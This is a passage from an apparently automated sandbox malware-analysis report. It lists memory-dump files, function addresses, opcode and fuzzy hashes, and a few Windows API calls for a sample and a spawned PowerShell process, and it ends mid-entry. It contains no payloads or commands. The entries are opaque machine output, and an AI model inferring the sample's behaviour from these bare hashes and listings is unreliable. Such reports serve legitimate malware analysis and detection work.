Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3125694417
Opcode ID: cb74b58fbf665d9c84b1068e3f9d72a75ce1c9c55f4980f1e918d92df7a9c5c8
Instruction ID: 957e04025a41c1941cffb014cac20df3e0ff5def3477a48c76d927f6f21090a4
Opcode Fuzzy Hash: cb74b58fbf665d9c84b1068e3f9d72a75ce1c9c55f4980f1e918d92df7a9c5c8
Instruction Fuzzy Hash: EED05EB3411D209AD3127B04DC04A9F67ACFF51300746846AE841A61A1D7B85C908AEC

Function 00405934 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00405B51,00000000,[Rename]), ref: 00405944
lstrcmpiA.KERNEL32(?,?), ref: 0040595C
CharNextA.USER32(?,?,00000000,00405B51,00000000,[Rename]), ref: 0040596D
lstrlenA.KERNEL32(?,?,00000000,00405B51,00000000,[Rename]), ref: 00405976

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 8032f475193f702fb71f6f03d8a24b737fcdd57b3ef24890a40e5d8249ef00b0
Instruction ID: d765cdcf26b5ece385e96dcd0ac43345a120d35f2bfa0d6b32256e58560247d7
Opcode Fuzzy Hash: 8032f475193f702fb71f6f03d8a24b737fcdd57b3ef24890a40e5d8249ef00b0
Instruction Fuzzy Hash: 60F09632504918FFC7129FA5DD00D9FBBA8EF163A4B2540BAE841F7211D674DE019F59

Analysis Process: powershell.exePID: 2572, Parent PID: 6732COMMON

Executed Functions

Function 0498F520 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2815773747.000000000498D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0498D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_498d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff10296548f4052cd1343da1a8a3f95fc164b6e639127d8b8c0ddbca908630b6
Instruction ID: 101958d4c1db08968c97029c71d674cb5f918e98b3858f87b1e86d0289936fa2
Opcode Fuzzy Hash: ff10296548f4052cd1343da1a8a3f95fc164b6e639127d8b8c0ddbca908630b6
Instruction Fuzzy Hash: BB21C476604240EFDF05EF18D9C0B26BF66FB88314F24C5ADE9094A25AC736E456CB61

Function 078177C9 Relevance: 1.9, Strings: 1, Instructions: 609COMMON

Download Yara Rule

Strings

l/9, xrefs: 078177CA

Memory Dump Source

Source File: 00000002.00000002.2823184439.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7810000_powershell.jbxd

Similarity

API ID:
String ID: l/9
API String ID: 0-2717826406
Opcode ID: 003b02d02356a35b09dbed9c112fbef4ece7056394d6faf0dbfe03bf6e0947dc
Instruction ID: 60a359e31540f2a4faa93945e1fafd044508d3908b2cc7682063b62869341ea1
Opcode Fuzzy Hash: 003b02d02356a35b09dbed9c112fbef4ece7056394d6faf0dbfe03bf6e0947dc
Instruction Fuzzy Hash: 47428274B00215DFD714DB58C850BAABBB6BF89714F10C0A9D908AF751CB72ED858F92

Function 0781BEDF Relevance: 1.0, Instructions: 995COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2823184439.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7810000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ca638d42415680c49792726ceaf4f4716368b644dac31c20e5138d501607be3
Instruction ID: 253d93b3612a1491566ff4b0547998c8badeaf8549356ee51e4c3b0d6bb41e02
Opcode Fuzzy Hash: 3ca638d42415680c49792726ceaf4f4716368b644dac31c20e5138d501607be3
Instruction Fuzzy Hash: E1925FB4B00219DFDB14DB58C854FAABBB2AF89744F1080A9D509AF751CB72DD81CF92

Function 078160E0 Relevance: .7, Instructions: 654COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2823184439.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7810000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54d70e57a9b2d730b35a795f7b5c2fecace37cc6f62ecdad69c23b241e10c59d
Instruction ID: 1ea222136ae2890cf330a43627e8702e7f27441add40223d4ed7234bbf968297
Opcode Fuzzy Hash: 54d70e57a9b2d730b35a795f7b5c2fecace37cc6f62ecdad69c23b241e10c59d
Instruction Fuzzy Hash: 7932EEB4B00209DBDB149FA8C450BAEBBA6AFD8714F14806AD541EF782DF71DC45CB92

Function 078180CA Relevance: .6, Instructions: 647COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2823184439.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7810000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eac5875f45b50c380cfdf5b3da7293b5833a453c3375c6f19e7b171f689e73dc
Instruction ID: 3d9270d6483b88ac45fa5cd0bf0f1a75f8e2e12c705679ff93bcf6ea35cb8688
Opcode Fuzzy Hash: eac5875f45b50c380cfdf5b3da7293b5833a453c3375c6f19e7b171f689e73dc
Instruction Fuzzy Hash: 635260B4B00215DFD714DF18C844BA9B7B6BB89714F15C0A9DA09AF351CB72ED818F52

Function 0781C72B Relevance: .6, Instructions: 621COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2823184439.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7810000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46d3f4962c02484c6403e519a3d45186d4ff06100682a34e50ab681f8e7d2f7d
Instruction ID: 4255369a576c7dbe44cf0ce6b0ba64b8b444967baed8ac634ca72b921b7c1f94
Opcode Fuzzy Hash: 46d3f4962c02484c6403e519a3d45186d4ff06100682a34e50ab681f8e7d2f7d
Instruction Fuzzy Hash: FA4250B4B402149FD714DB18C850FAABBB2AFC9744F1180A9D9099F791CB72ED81CF92

Function 07816D90 Relevance: .5, Instructions: 544COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2823184439.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7810000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2ce21452abe1741050d58dc7d182274eea468162c62d46934cdaf6d006d7027
Instruction ID: f29985784f2e85c16431e314878ae35e5aa20a4f0677ef6ec3864442f011fd48
Opcode Fuzzy Hash: d2ce21452abe1741050d58dc7d182274eea468162c62d46934cdaf6d006d7027
Instruction Fuzzy Hash: C62229B4B00205DFDB04CF98D454FAEBBB6AF89714F258069E9059B791CB72EC428F52

Function 0781C811 Relevance: .5, Instructions: 469COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2823184439.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7810000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40a332c358406b19ecf47ab8434c30441a377888753fc6b4ee1a8074b649f058
Instruction ID: cd5be1febf8a346017487eb610e21b4a7850eff651441122d2645c318f239cce
Opcode Fuzzy Hash: 40a332c358406b19ecf47ab8434c30441a377888753fc6b4ee1a8074b649f058
Instruction Fuzzy Hash: D21240B47002149FD714DB58C854FAABBB2EBC9744F1180A9E9099F791CB72ED81CF92

Function 0781C8B1 Relevance: .4, Instructions: 428COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2823184439.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7810000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 918f6e892df16dd419467a75a5fda243d3ed36bb99501e23b623cec031ddc798
Instruction ID: 1275239e9b33a5d88ab85d8e968d27910acb77417f9b1d51e53010cf62008688
Opcode Fuzzy Hash: 918f6e892df16dd419467a75a5fda243d3ed36bb99501e23b623cec031ddc798
Instruction Fuzzy Hash: 87124AB4B40219DFDB24DF18C844BAABBB6BB99704F11C0A5E509AB351CB72DD81CF52

Function 09711E68 Relevance: .4, Instructions: 426COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2831949700.0000000009710000.00000040.00000800.00020000.00000000.sdmp, Offset: 09710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9710000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94ff7150951163363b6f0c7d9b26be48404be8373c525ed9bef9a7a0ef2536b4
Instruction ID: 3a12531228a3d571c55b2f2da77db02f5d461fa917cee7b2af99a6f375a045c5
Opcode Fuzzy Hash: 94ff7150951163363b6f0c7d9b26be48404be8373c525ed9bef9a7a0ef2536b4
Instruction Fuzzy Hash: DC021A75A01209DFDB05DF9CD884AAEBBB2FF88310F248159E915AB366C771ED41CB90

Function 09712428 Relevance: .4, Instructions: 421COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2831949700.0000000009710000.00000040.00000800.00020000.00000000.sdmp, Offset: 09710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9710000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d27637cd85f25e35d05b654775910dfd53f3a19fec827a9c65bef0e6e97b9dd
Instruction ID: 41171013fcff40d335fc38dd92949a76b3c250f9d8e2d9d4b7707b92ced6df25
Opcode Fuzzy Hash: 7d27637cd85f25e35d05b654775910dfd53f3a19fec827a9c65bef0e6e97b9dd
Instruction Fuzzy Hash: 45022E75A01209DFDB05CF9CD894A9EBBB2FF88310F248159E915AB362C775ED81CB90

Function 07816D71 Relevance: .4, Instructions: 407COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2823184439.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7810000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bae91c02b21198be6774d65a9f3ce0597495c59de6263a35764467f8efd3474b
Instruction ID: e7ebcc5307ed8e83e36f762a8e53f8a859c14b8c44bf229f4b2c8cfc3a921203
Opcode Fuzzy Hash: bae91c02b21198be6774d65a9f3ce0597495c59de6263a35764467f8efd3474b
Instruction Fuzzy Hash: D0F138B4B01205EFDB04CF98C584FA9BBB6EF98714F158069E9059B391CB72ED428F52

Function 097114A0 Relevance: .4, Instructions: 399COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2831949700.0000000009710000.00000040.00000800.00020000.00000000.sdmp, Offset: 09710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9710000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31b223c536a15d1c23045e95b75fe27274206d991db8e6314757676da847ad52
Instruction ID: 74c59130357d22f96d39ea14d0f8890caedebd6b94aa370e87a968a62e3892c9
Opcode Fuzzy Hash: 31b223c536a15d1c23045e95b75fe27274206d991db8e6314757676da847ad52
Instruction Fuzzy Hash: 88021875A05209DFDB05CF9CD884AADBBB2FF88310F648159E915AB361CB31ED81CB90

Function 07814548 Relevance: .4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2823184439.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7810000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ff0da38b9aadb3e05ea81290fa3e69dbc4be6eee6e63ef282490d342d98a0c1
Instruction ID: 072a6a7e1a97a035c03731ea454d79237e597041bc0b5845a4cbac576603e53e
Opcode Fuzzy Hash: 6ff0da38b9aadb3e05ea81290fa3e69dbc4be6eee6e63ef282490d342d98a0c1
Instruction Fuzzy Hash: 50E17BB4B00245DFD714CF98C454BAABBB6AF99704F14C069E909DB751CB72EC42CB92

Function 09710B80 Relevance: .4, Instructions: 356COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2831949700.0000000009710000.00000040.00000800.00020000.00000000.sdmp, Offset: 09710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9710000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dc2eb8b7c130f74a5bf5054a1b5dfe8b85ab36f723811d746f5d5d0cd985010
Instruction ID: 073e41df409bdf836c9bb0d971a04a11f73541d7e3a1c7d51dd460d6bd834fbd
Opcode Fuzzy Hash: 1dc2eb8b7c130f74a5bf5054a1b5dfe8b85ab36f723811d746f5d5d0cd985010
Instruction Fuzzy Hash: 22E11975A01249DFDB15DFACC894A9DBBB2FF89310F248159E844AB351CB71ED82CB90

Function 0781452D Relevance: .3, Instructions: 343COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2823184439.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7810000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28d05d84ece9e75da64153df2431694157c66328c339cf346df455ca78cd3718
Instruction ID: 644d86b2cefad9c0f02a4d3447247d517edc9ab8c757f6f10140711c0118e4f9
Opcode Fuzzy Hash: 28d05d84ece9e75da64153df2431694157c66328c339cf346df455ca78cd3718
Instruction Fuzzy Hash: B6E157B4B002459FDB14CF98C444FAABBB6AF99714F158069E909EB351CB72EC42CF51

Function 0781C89B Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2823184439.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7810000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfad9687e17ebd7808a71254e47d131339bec3b7b6c25d9a893f2e866ff2a547
Instruction ID: 944ec39cb24faa3f528967e761d77266d08f5773a2ad5256e06486efadaf95fc
Opcode Fuzzy Hash: dfad9687e17ebd7808a71254e47d131339bec3b7b6c25d9a893f2e866ff2a547
Instruction Fuzzy Hash: DFE15BB4B40219DFDB24DB14C844FAABBB6BB99704F1081D4D509AB351CB72DD81CF52

Function 04E7A980 Relevance: .3, Instructions: 314COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2816096656.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4e70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e9eeb4955ae070603005c0f1238da5540b50cc1e960027e961899cfa13cbb66
Instruction ID: 0c1470c598b69cf71547838e7306b5a11f91836257ea98b044bf6a6585fda826
Opcode Fuzzy Hash: 6e9eeb4955ae070603005c0f1238da5540b50cc1e960027e961899cfa13cbb66
Instruction Fuzzy Hash: 27D11934A01249EFDB05CFA8D584A9DFBF2AF88314F25C1A9E844AB361D775ED41CB90

Function 04E772A0 Relevance: .3, Instructions: 313COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2816096656.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4e70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4209aa5b23773696b332f1cc0c9086dafae968cf358f983332dad1821cb7333c
Instruction ID: 00694e3c63e482eefff76e08d67e6e010d9d45be932dadc86aa8aa86253bef23
Opcode Fuzzy Hash: 4209aa5b23773696b332f1cc0c9086dafae968cf358f983332dad1821cb7333c
Instruction Fuzzy Hash: FDC18F31A00248DFDB14DFA4D944AADBBB2FF84324F118569E406AB364DB74FD49CB80

Function 097107C8 Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2831949700.0000000009710000.00000040.00000800.00020000.00000000.sdmp, Offset: 09710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9710000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34c050b49e76038c5b8b3c55bdcdc1be864462e1bb9b7434fa7c74d320984723
Instruction ID: c8289e1c97f7c9df1ed9c0d6565d1ae6981855e8b623d5846391c9ccb467bee6
Opcode Fuzzy Hash: 34c050b49e76038c5b8b3c55bdcdc1be864462e1bb9b7434fa7c74d320984723
Instruction Fuzzy Hash: C1818C71B002098FDB15DFA9D854AAEBBF6FFC8300F148169D805AB355DB75AC46CBA0

Function 04E72AA0 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2816096656.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4e70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e626c190b90b758071c464bd9b99ec15a7c71f17a2775a4a826a39ff26da8bdd
Instruction ID: 1b257df82713a2280b2cf5048a6627385950f61fed9c053d2f243cb7230aa641
Opcode Fuzzy Hash: e626c190b90b758071c464bd9b99ec15a7c71f17a2775a4a826a39ff26da8bdd
Instruction Fuzzy Hash: BB919E74A00245CFCB16CF59C4949AEFBB1FF89324B248699DA55AB3A1C731FC51CBA0

Function 04E77A68 Relevance: .2, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2816096656.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4e70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e6be980344f79df6a72ccdc79bfc782a85baa5cd366af66d7639c5773fa7309
Instruction ID: 44001d49462571feb5ac72fa42f9ecd9f6e8eb6ab5645b32b7d5ff15ae32dae3
Opcode Fuzzy Hash: 7e6be980344f79df6a72ccdc79bfc782a85baa5cd366af66d7639c5773fa7309
Instruction Fuzzy Hash: 09719930A04209DFDB14DF68C880A9EBBF2FF85324F14896AD4199B651DB75BC46CB90

Function 04E77BD6 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2816096656.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4e70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf2d607df31d3e7b19ac4744a7a0b2151f03ccb7653bea788137c3aa1e1427f5
Instruction ID: 78f76af2137454ecab7aeb00f54e337f0a734b25ffef375f7bb1e80865b91b43
Opcode Fuzzy Hash: bf2d607df31d3e7b19ac4744a7a0b2151f03ccb7653bea788137c3aa1e1427f5
Instruction Fuzzy Hash: F1714C70A00248DFDB14DFA4D884AADBBF2FF88354F149469D412AB790DB75BD46CB90

Function 04E7D627 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2816096656.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4e70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51350108e926e9764a6db9b78ff2494485b109fbdd0adf0353fffd6c0d28d0b0
Instruction ID: f89f712033fca0dbef5096e59721d24908e3b41b1f79dbf699110cb2fc4a372f
Opcode Fuzzy Hash: 51350108e926e9764a6db9b78ff2494485b109fbdd0adf0353fffd6c0d28d0b0
Instruction Fuzzy Hash: F8518430B002448FEB05DB78C854BAEBFF2EFC5314F18846AD845AB792CE759C468B61

Function 097129E0 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2831949700.0000000009710000.00000040.00000800.00020000.00000000.sdmp, Offset: 09710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9710000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c74a55250bfee42ce17a0abbe5b975c34cc6e6c59c3ce922a44431bd45385ebd
Instruction ID: 6477d34b76a5a797cf5c7a871626fed8010e8e78a33dc8471be4fd597e3baac3
Opcode Fuzzy Hash: c74a55250bfee42ce17a0abbe5b975c34cc6e6c59c3ce922a44431bd45385ebd
Instruction Fuzzy Hash: 07513E35A00609DFCB15CF9CC8959AEBBB2FF88310B248259E925E7395D735EC52CB90

Function 07813E00 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2823184439.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7810000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9aee4fcbe4c30870fc0838b857d84ea5c802d9c9eafa6bd1f1da5e31f9578f5d
Instruction ID: cb5de21b47e86e62b2c6f2a370fb60a468c662a341793107352579f8c505d38c
Opcode Fuzzy Hash: 9aee4fcbe4c30870fc0838b857d84ea5c802d9c9eafa6bd1f1da5e31f9578f5d
Instruction Fuzzy Hash: 644146B6B00215DBCB289E68D8002BAF7A9EFD4610B14816AC905EBB41EF31D915C7E2

Function 04E77A53 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2816096656.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4e70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32b755fc3b5ab33f0f1887f473e47ae9b489124357c07dbb167587ee986c603e
Instruction ID: 1eeffa56f9b0f286c57a6ee179e9fac6caec95cc3daeda899fba420de2bbb978
Opcode Fuzzy Hash: 32b755fc3b5ab33f0f1887f473e47ae9b489124357c07dbb167587ee986c603e
Instruction Fuzzy Hash: 32415A70A04208DFDB14DFA9C844AAEBBB2EF84354F14846ED406AB790DB75BC45CB90

Function 097129D0 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2831949700.0000000009710000.00000040.00000800.00020000.00000000.sdmp, Offset: 09710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9710000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a91a7b0dbe01adf3e28831f7d9e3124ba7b892f6bfa05fe423f82e5d3cb1f32f
Instruction ID: 832302ecfe9f6dab9d34793d4686fb4aa4d14ad28b643fb6d3a93beb373f2201
Opcode Fuzzy Hash: a91a7b0dbe01adf3e28831f7d9e3124ba7b892f6bfa05fe423f82e5d3cb1f32f
Instruction Fuzzy Hash: D7512F75A00609DFCB15CF9CC8959AEFBB2FF88314B248258E925AB395D731EC52CB50

Function 04E777F9 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2816096656.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4e70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7261a4c63d36d2811469f8e5c46fd3e5f3a7a73e871e3ef6b0e891452754daf
Instruction ID: afd94771fab3644c13197e186321ac4fa9fafb4a8d968a8540ecb23231bd1186
Opcode Fuzzy Hash: d7261a4c63d36d2811469f8e5c46fd3e5f3a7a73e871e3ef6b0e891452754daf
Instruction Fuzzy Hash: 5E419B31A042108FEB15DF74C954AAEBFB2EF88764F045469E446EB7A0DB39AD41CB90

Function 04E7D680 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2816096656.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4e70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ad2ac74f1c70a317305a5bee5e1f3debd787022dd221eec88e83e16a68bac4b
Instruction ID: 10684c4c4c56a5ab4fb7fbcc02e93c136d4232d5d9fa4f668aecafce364f908d
Opcode Fuzzy Hash: 8ad2ac74f1c70a317305a5bee5e1f3debd787022dd221eec88e83e16a68bac4b
Instruction Fuzzy Hash: 33413430B002049FEB14DFB9C854BAEBAE7EFC8310F14C469D805AB755CE75AC459BA0

Function 09711490 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2831949700.0000000009710000.00000040.00000800.00020000.00000000.sdmp, Offset: 09710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9710000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c612204250bc765d364738aed880d0d00f089b89dc7bc22f9cab3c3e7b3a77eb
Instruction ID: c418f8f573193a709aed3c64928a3a9f9d8ad6aa24cdc4b007719cf74154902a
Opcode Fuzzy Hash: c612204250bc765d364738aed880d0d00f089b89dc7bc22f9cab3c3e7b3a77eb
Instruction Fuzzy Hash: 21414B75A05109DFCB05CF9CC9809ADBBB2FF89310B648258E915EB361D731EC51CBA0

Function 09712417 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2831949700.0000000009710000.00000040.00000800.00020000.00000000.sdmp, Offset: 09710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9710000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
